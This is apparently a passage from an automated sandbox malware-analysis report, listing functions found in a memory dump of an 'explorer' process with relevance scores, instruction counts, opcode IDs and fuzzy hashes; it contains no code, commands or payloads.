                                  • Instruction ID: 35759bb161561aa3203d22c42f86f3650ba32df2502fc31f5a08abee035bea2a
                                  • Opcode Fuzzy Hash: 9234595ca1bddadf679c52ccfb2e1f648a997a925d2a8c403eb0036edf231647
                                  • Instruction Fuzzy Hash: F4B1D130A0A68E8FD756EB64C8686F9BBF1FF19304F0645BBD419C70A2DB78A644C711
                                  Function 00007FFD9BAB10A7 Relevance: 3.9, Strings: 3, Instructions: 139COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$$$]
                                  • API String ID: 0-2298843587
                                  • Opcode ID: 21c1c586aa9c0dcfa0563624b687ad6fe7a3099125ca8792a9add1b6d29af05e
                                  • Instruction ID: 4260cf41e7a4a69eaf1ecbb33e808bfd6596eaf852f1b7c24c13287c2d6ad79f
                                  • Opcode Fuzzy Hash: 21c1c586aa9c0dcfa0563624b687ad6fe7a3099125ca8792a9add1b6d29af05e
                                  • Instruction Fuzzy Hash: 3C51C570E1522DCFEB68DF94D8A4BECB6B1BB54300F1140AED05EA7291CB785A84DF10
                                  Function 00007FFD9BAAE82E Relevance: 3.9, Strings: 3, Instructions: 102COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: B$]${
                                  • API String ID: 0-2568630444
                                  • Opcode ID: e7ad58fe612a21e47f9f183746a020fef47156e990c297a197dd1d3dc9d5e4a4
                                  • Instruction ID: 193c0a947b12abbf2998a4eb9d10c4eec52bc590fe3e136c6e3811da9a33c221
                                  • Opcode Fuzzy Hash: e7ad58fe612a21e47f9f183746a020fef47156e990c297a197dd1d3dc9d5e4a4
                                  • Instruction Fuzzy Hash: 3B419170E0966D8FDB78DF54C8A47E9B7B2BB54301F1101EAD40DA72A1CB786A84CF51
                                  Function 00007FFD9BAAE6A9 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h
                                  • API String ID: 0-2439710439
                                  • Opcode ID: 9eb954d624a1f443401f3d900e21a51ce0b27b36505565dd54ca942e86d77c8c
                                  • Instruction ID: e99b639af282834ea8d8acff98dc1351ec1d121c6349e3b5bf3cff6980f39d41
                                  • Opcode Fuzzy Hash: 9eb954d624a1f443401f3d900e21a51ce0b27b36505565dd54ca942e86d77c8c
                                  • Instruction Fuzzy Hash: 88315E71A0965E8FEBA8DF5488657A9B3A2FF58310F0102FAD01DD32A1DF745E808F11
                                  Function 00007FFD9BAAE85F Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O
                                  • API String ID: 0-878818188
                                  • Opcode ID: a81b4dd505779a9e968d179f48a74a795e220f49d8364990c9d7a0701d5213dc
                                  • Instruction ID: 1692ce029d65b98738306746e4f9579f09d3a3b8ed4ddc401db7ac2b38c9a2fc
                                  • Opcode Fuzzy Hash: a81b4dd505779a9e968d179f48a74a795e220f49d8364990c9d7a0701d5213dc
                                  • Instruction Fuzzy Hash: 4511DA71A0965D8BDBA8DF54D8A47F9B7B2FB54341F1002EE900EE2291CBB51E81CF40
                                  Function 00007FFD9BAAC740 Relevance: .7, Instructions: 729COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192e30145d8619bc27843c3c055ce91e7c79bfacbb35249687dc75eadf019c92
                                  • Instruction ID: 82d68ccbdc02d1a6921de0bde4ce2f9b3195bd6a815a6d87211b492fdbd287b8
                                  • Opcode Fuzzy Hash: 192e30145d8619bc27843c3c055ce91e7c79bfacbb35249687dc75eadf019c92
                                  • Instruction Fuzzy Hash: A451C630A4A65D4FDB99EF64C8695B97BB0FF15304F0104BED42AC60E2DEB5AA44CB01
                                  Function 00007FFD9BAA0AA1 Relevance: .5, Instructions: 473COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f2bc45c33047d2c77d6751a5122dba99f3ae977b0875e729d37853849fe2b81
                                  • Instruction ID: a7d213045d9a775e112f6c623ce6b9914cdddfea8596ee762626f8dfa98f0de8
                                  • Opcode Fuzzy Hash: 7f2bc45c33047d2c77d6751a5122dba99f3ae977b0875e729d37853849fe2b81
                                  • Instruction Fuzzy Hash: 02F1D131E0A60E4FEBB4EB648864BED77A2FF55700F0142BAD01DD71E2DE786A448B54
                                  Function 00007FFD9BAA2D32 Relevance: .4, Instructions: 374COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3db991045d51bc04c6a764827b058fb9fabaaf3ced7a0f648ee745006a3221d7
                                  • Instruction ID: c8cc586d24394f99ea436e659097a8b4824873f9b2a4abe73db9d615cd835ba0
                                  • Opcode Fuzzy Hash: 3db991045d51bc04c6a764827b058fb9fabaaf3ced7a0f648ee745006a3221d7
                                  • Instruction Fuzzy Hash: 13C1E530A0E64E8FE761EBA4C9696B97BE1FF15300F0645B6D408C70B2EE78A654C761
                                  Function 00007FFD9BAB2CB0 Relevance: .4, Instructions: 363COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c9564388453a6758ec18f2c5e8d1d6deed69cc3247b06a7dea300065801fd1a
                                  • Instruction ID: 0d0dac6737727a7f48b8602530875fdc403849fa1b2f81c49dae8389454407c8
                                  • Opcode Fuzzy Hash: 1c9564388453a6758ec18f2c5e8d1d6deed69cc3247b06a7dea300065801fd1a
                                  • Instruction Fuzzy Hash: DAC1B530A0E74E4FEB65EBA488696F97FF0FF19310F0545BBD458C60A2DA78A6448B41
                                  Function 00007FFD9BAAC418 Relevance: .4, Instructions: 362COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 003f8fe40e6c1e0304bfd37842298beed44f43545ad876bb9f9b3667abc1aca0
                                  • Instruction ID: 01645b8f1cfccfd7259b8f106472c3bff34b25d9705d8d2298610e8add9d01a9
                                  • Opcode Fuzzy Hash: 003f8fe40e6c1e0304bfd37842298beed44f43545ad876bb9f9b3667abc1aca0
                                  • Instruction Fuzzy Hash: 7FC14631A0D65A8FE765BB6C9C241F93BA0FF1532AF0501B7E459CA0E3EA3C6544C790
                                  Function 00007FFD9BAB2C30 Relevance: .4, Instructions: 355COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3cb6f247feb8dfbeb68169c1b3e47f5287bd8cf9fa0d45a9779f0c836a3e1ec
                                  • Instruction ID: 32836d3f020a8b67468fb22740b335422ec1b0484f81dcc0b59217f17d6b44fa
                                  • Opcode Fuzzy Hash: a3cb6f247feb8dfbeb68169c1b3e47f5287bd8cf9fa0d45a9779f0c836a3e1ec
                                  • Instruction Fuzzy Hash: 3AC1DA31A1E78E4FE761ABB498292F97FF0FF15310F0545BBD458C60A3DA68A648CB41
                                  Function 00007FFD9BAB2160 Relevance: .3, Instructions: 335COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59f63eb78fdc1c4d197e14c03bc4f410b5363ec8093f4671eef43da5a2a8ac0d
                                  • Instruction ID: 7f333c3ea00dc1e0f37c66e71e3f67d51667f8995cc4f94f7233ecfc562c7a43
                                  • Opcode Fuzzy Hash: 59f63eb78fdc1c4d197e14c03bc4f410b5363ec8093f4671eef43da5a2a8ac0d
                                  • Instruction Fuzzy Hash: 39C1AC30A1965E8FDB55EFA4D8686EA7BF0FF19300F0145BBD429C31A1DB78A644CB41
                                  Function 00007FFD9BAAC498 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b376717a2cdfed54e73f0f3e690fdec251bdf8be196afa84fcfd4000103716ef
                                  • Instruction ID: 9479266fd54bf3c3b167aec6d4c134f6ca4ae0a187c0646b6761933f91ef97ee
                                  • Opcode Fuzzy Hash: b376717a2cdfed54e73f0f3e690fdec251bdf8be196afa84fcfd4000103716ef
                                  • Instruction Fuzzy Hash: E8B14732A0D65A4FE725FB6CAC245F93BA0EF1532AF0501B7E45DCA0E3EA2C6545C790
                                  Function 00007FFD9BAA3408 Relevance: .3, Instructions: 321COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: deedd9036bf611898395ff205ef95e76ac03b4b02bd57dc232907d76b2b62da0
                                  • Instruction ID: e410d2cf7b0ded1a0e8ebabbc0bd996155d8a949a31f4fa5e3e35d2965d1cba0
                                  • Opcode Fuzzy Hash: deedd9036bf611898395ff205ef95e76ac03b4b02bd57dc232907d76b2b62da0
                                  • Instruction Fuzzy Hash: 84B1D231A0E68E8FEB95EB68C8696B97BF1FF19300F0505BAD009C71E2DB786541CB10
                                  Function 00007FFD9BAAAA58 Relevance: .3, Instructions: 292COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 185829b472f0a265eda594807c384f84c779e161b16f78d02bae31a0eef99627
                                  • Instruction ID: 6aa8e59a2ca8d3d6d991e5e670d0694ed7129be7a056df517c0bbc1513fc8045
                                  • Opcode Fuzzy Hash: 185829b472f0a265eda594807c384f84c779e161b16f78d02bae31a0eef99627
                                  • Instruction Fuzzy Hash: B0A18F30A5A39E8FDB659FA498652E97FF0FF05304F0145BBE819C21A1DB78A644CB41
                                  Function 00007FFD9BAA1758 Relevance: .3, Instructions: 288COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93fe828c4cf34b936bb26260bf6255b4a4f611f1f2652ccf33791da6a48fa921
                                  • Instruction ID: e5930cdfeab4a89fb83b705cbd549d3611de460aff24f71964c88fdf39382780
                                  • Opcode Fuzzy Hash: 93fe828c4cf34b936bb26260bf6255b4a4f611f1f2652ccf33791da6a48fa921
                                  • Instruction Fuzzy Hash: 2591E131B0DA894FDB68DF5C88616B977D3EFE9300B15417AE49DC7296DE20AC02C780
                                  Function 00007FFD9BAB0A4D Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 268e36c17688986ab5bb7575a99d14f7671c867df1db2d87fbcf525b7fe212ee
                                  • Instruction ID: 429a4ff2668f9b6b5bdec5d58137ae7db4f80a776ccad2628afb8e4672cc2709
                                  • Opcode Fuzzy Hash: 268e36c17688986ab5bb7575a99d14f7671c867df1db2d87fbcf525b7fe212ee
                                  • Instruction Fuzzy Hash: 0591A430A0E79E8FDBA59F6488656FA7BB0FF16300F0505BBD458C71A2DB78A644CB41
                                  Function 00007FFD9BAAC528 Relevance: .3, Instructions: 274COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fbac546b20185d37dbe9ea13cbed35d0d13e87396c13d38846e771cec31739bd
                                  • Instruction ID: 3f06c639bea16e6a8366dd1dc1109d9b748defe42f64340c8a5f4a7df1a9b8f9
                                  • Opcode Fuzzy Hash: fbac546b20185d37dbe9ea13cbed35d0d13e87396c13d38846e771cec31739bd
                                  • Instruction Fuzzy Hash: 40911832B0D65A4FE725BB6CAC214F93BA0EF1533AB0502B7E559CA0E3DA2C7545C390
                                  Function 00007FFD9BAACA9D Relevance: .3, Instructions: 262COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba2544b16051960d8aa79d0826277dd1ea232a97de208ebd96d2d39947b9baa0
                                  • Instruction ID: bf9dd937433b9f4ce45abe0ae1770303492404311daec9837a3bd28f152f68a0
                                  • Opcode Fuzzy Hash: ba2544b16051960d8aa79d0826277dd1ea232a97de208ebd96d2d39947b9baa0
                                  • Instruction Fuzzy Hash: A8812231E0961E4FE761FBB8E8255E97BE0FF19325F0146B7E41CC70A2DE24A1888B41
                                  Function 00007FFD9BAA2185 Relevance: .3, Instructions: 253COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e41970efa7ac8081d24a028d7ffc4d24e19902b9cade95a2dd5886298bacb12
                                  • Instruction ID: f6e8591d526741cf680ca3e6a2fa45c6287400984a7a07b4189a310ee57a42f4
                                  • Opcode Fuzzy Hash: 9e41970efa7ac8081d24a028d7ffc4d24e19902b9cade95a2dd5886298bacb12
                                  • Instruction Fuzzy Hash: 1B711531B0E74E4FE7759BA489312B87BE2EF46300F0601BAD45DC70E2DE68AA158761
                                  Function 00007FFD9BAB5EA0 Relevance: .3, Instructions: 251COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ff42d33f9f06c577f690dde7ace892e1b22a39deba210208937ced1837dd3cf
                                  • Instruction ID: e0801f7392c7b8c77f0c69fc4db26bebc838916358fc90ee2348ce6bbddf7b88
                                  • Opcode Fuzzy Hash: 1ff42d33f9f06c577f690dde7ace892e1b22a39deba210208937ced1837dd3cf
                                  • Instruction Fuzzy Hash: 56A12170E0A65D8EEBB4DBA8C8657EDB7B1FF05300F0141BAD45DD2192DA786A848F01
                                  Function 00007FFD9BAAC5FD Relevance: .2, Instructions: 250COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b4e5eaa362ce54f7e8aa8ab8d85d2efa5350b96d1fa502d80df17adb6663cf2
                                  • Instruction ID: a642942ede5ecd4ec8fe020a8d89eb8cc9838e3bade6479369036048b932490f
                                  • Opcode Fuzzy Hash: 6b4e5eaa362ce54f7e8aa8ab8d85d2efa5350b96d1fa502d80df17adb6663cf2
                                  • Instruction Fuzzy Hash: 7C710526B0D6664AE325B7ACBC214E93B50EF5533EB0942B7E59DCD0E7EE1C3045C2A4
                                  Function 00007FFD9BAABD28 Relevance: .2, Instructions: 243COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a806b59eea127f89ce5d61fb4e98fe4f2e5da75145db327121763392613e9eeb
                                  • Instruction ID: 0679dbed0810add20de03e068a644205125c3d9a3ba958fb029cf720a0a9dd6e
                                  • Opcode Fuzzy Hash: a806b59eea127f89ce5d61fb4e98fe4f2e5da75145db327121763392613e9eeb
                                  • Instruction Fuzzy Hash: 6E81A030A4E78D8FE7669B7488692E97FB0EF16300F4645FBD448C70B2DA78A648C751
                                  Function 00007FFD9BAA2AC5 Relevance: .2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b61a1f6eda26dbc73ca992bce24372a795666a2c4cca9ab3015640325d25854
                                  • Instruction ID: e7603f30ed0f0f1acca832cffaeb9a01a3c08268bb71e349e76df9ded6136175
                                  • Opcode Fuzzy Hash: 9b61a1f6eda26dbc73ca992bce24372a795666a2c4cca9ab3015640325d25854
                                  • Instruction Fuzzy Hash: A481A630A0A65E8FE765EB64C868AFD7BF0FF15301F0145BBD429C71A2DAB4A944CB01
                                  Function 00007FFD9BAA2250 Relevance: .2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f8e1daae904c52a6d4f86050fa2415d6a935a0576c4af5b9586126d65e5cfb6
                                  • Instruction ID: 25e2983a607a83a178b3634304f76add62652969219ac522187266352a64aa7a
                                  • Opcode Fuzzy Hash: 8f8e1daae904c52a6d4f86050fa2415d6a935a0576c4af5b9586126d65e5cfb6
                                  • Instruction Fuzzy Hash: 2E81C430E0E60E8FE774EBA4C9246B8B7A2FF45300F0241BAD40DD71A2DE786654CB61
                                  Function 00007FFD9BAB0AE8 Relevance: .2, Instructions: 228COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfc636a42cc05af2ad21bcfbceb0cee544ccf75dbe89fea4dae6afacd45fb704
                                  • Instruction ID: f582fb73f4dac06681bbf30f8cfc9114ae63aaceaf24f9073b30fadbe1cbd860
                                  • Opcode Fuzzy Hash: dfc636a42cc05af2ad21bcfbceb0cee544ccf75dbe89fea4dae6afacd45fb704
                                  • Instruction Fuzzy Hash: 5B71923090A69E8FDBA5DF64C8696FA7BB0FF15304F0105BBD818C71A1DB74A654CB41
                                  Function 00007FFD9BAAC5B8 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b35429938280d8c2c0a0408ab18712d1806e9e13a7f857a80f3b79e5e61150b
                                  • Instruction ID: 1ffd57b69034f2e7ae71a64b71f73d2f0500acccf4534e04542bc92e787a6d20
                                  • Opcode Fuzzy Hash: 2b35429938280d8c2c0a0408ab18712d1806e9e13a7f857a80f3b79e5e61150b
                                  • Instruction Fuzzy Hash: AB610922B0D6664AE326B7ACBC214F97B60EF1533AB0542B7E59DCD0D3DA2C3445C3A0
                                  Function 00007FFD9BAAAA48 Relevance: .2, Instructions: 217COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a87b4f8c0b371fccfc63fa8d02c9d6eae50cb4f540e10947d25c18dab05bcf0d
                                  • Instruction ID: d89df09cc154b0d2dcddd89ff62f1e3532c799a63710d94ac97bc6e0ca171fdf
                                  • Opcode Fuzzy Hash: a87b4f8c0b371fccfc63fa8d02c9d6eae50cb4f540e10947d25c18dab05bcf0d
                                  • Instruction Fuzzy Hash: 02719E30E1A35E8FDB659FA4D8252EA7BF0FF09300F01457BE819D21A1DB78A644CB41
                                  Function 00007FFD9BAA2A88 Relevance: .2, Instructions: 208COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 267bb556bae9fc03c38f8a13b3d4907097b94e5bd792076f331b7c40cf7938b8
                                  • Instruction ID: 38dc5003143db14926a069bce3b0b073f87031c8c89716e647b0642c8f04fa09
                                  • Opcode Fuzzy Hash: 267bb556bae9fc03c38f8a13b3d4907097b94e5bd792076f331b7c40cf7938b8
                                  • Instruction Fuzzy Hash: A161B331E0E64E8EEB60EBA8C8246FDBBF1EF15315F014176D409D71A2DE786644CB60
                                  Function 00007FFD9BAA1D6D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc2a560aa6ccaca749890626941fb6e8e1c29a6aaafc9fca5c778dda3445cfac
                                  • Instruction ID: a94a700a077bf13b3cc94fb8509092693d13a9ca71e9d57bc65e694bc1150758
                                  • Opcode Fuzzy Hash: bc2a560aa6ccaca749890626941fb6e8e1c29a6aaafc9fca5c778dda3445cfac
                                  • Instruction Fuzzy Hash: 1751DE31B18B894FDB68DF4888645BA77E2FFE9304B15457EE45AC7296CE34E802C780
                                  Function 00007FFD9BAAAA60 Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06f8372f5b095c4f0344feeb164b0807320614367b5c1bbbed82ad5a9de8bbe3
                                  • Instruction ID: 5540d62c18f8a85ccd01678218d5c3ae6976b990589548d04d6538c490666834
                                  • Opcode Fuzzy Hash: 06f8372f5b095c4f0344feeb164b0807320614367b5c1bbbed82ad5a9de8bbe3
                                  • Instruction Fuzzy Hash: 45617D30E1935E8FDB64DFA4D8652EE7BF0FF09304F01467AE829D2191DB78A6548B81
                                  Function 00007FFD9BAA2AA8 Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 691fc1d1a3f387eb9eb6a7cf95666276b830a1ccfde6c9e028b2dbb690bfc4fa
                                  • Instruction ID: 452ddb1888e99c43fa9c0d6cb72197927137455fde8cce2603221c095945441e
